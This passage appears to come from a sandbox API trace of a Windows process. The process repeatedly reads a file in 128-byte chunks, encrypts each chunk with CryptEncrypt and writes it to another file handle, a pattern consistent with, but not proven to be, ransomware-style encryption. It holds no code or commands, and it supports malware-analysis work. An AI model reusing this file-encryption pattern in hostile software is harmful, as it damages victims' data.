pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.508] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.508] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.508] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.508] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.508] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.508] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.508] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.508] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.508] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.508] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.508] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.508] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.508] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.508] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.508] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.508] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.509] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.509] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.509] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.509] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.509] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.509] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.509] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.509] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.509] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.509] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.509] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.509] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.509] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.509] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.509] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.509] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.509] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.509] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.509] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.509] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.509] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.509] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.510] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.510] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.510] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.510] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.510] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.510] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.510] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.510] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.510] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.510] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.510] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.510] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.510] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.510] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.510] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.510] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.510] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.510] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.510] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.510] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.511] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.511] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.511] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.511] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.511] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.511] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.511] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.511] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.511] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.511] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.511] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.511] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.511] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.511] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.511] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.511] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.511] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.511] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.511] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.511] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.512] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.512] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.512] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.512] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.512] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.512] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.512] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.512] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.512] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.512] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.512] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.512] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.512] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.512] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.512] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.512] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.512] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.512] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.512] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.512] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.513] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.513] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.513] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.513] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.513] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesWritten=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.513] ReadFile (in: hFile=0xb8, lpBuffer=0x2869c8, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x12f110, lpOverlapped=0x0 | out: lpBuffer=0x2869c8*, lpNumberOfBytesRead=0x12f110*=0x80, lpOverlapped=0x0) returned 1 [0045.513] CryptEncrypt (in: hKey=0x29ff10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80, dwBufLen=0x100 | out: pbData=0x2869c8*, pdwDataLen=0x12f110*=0x80) returned 1 [0045.513] WriteFile (in: hFile=0xc4, lpBuffer=0x2869c8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12f110, 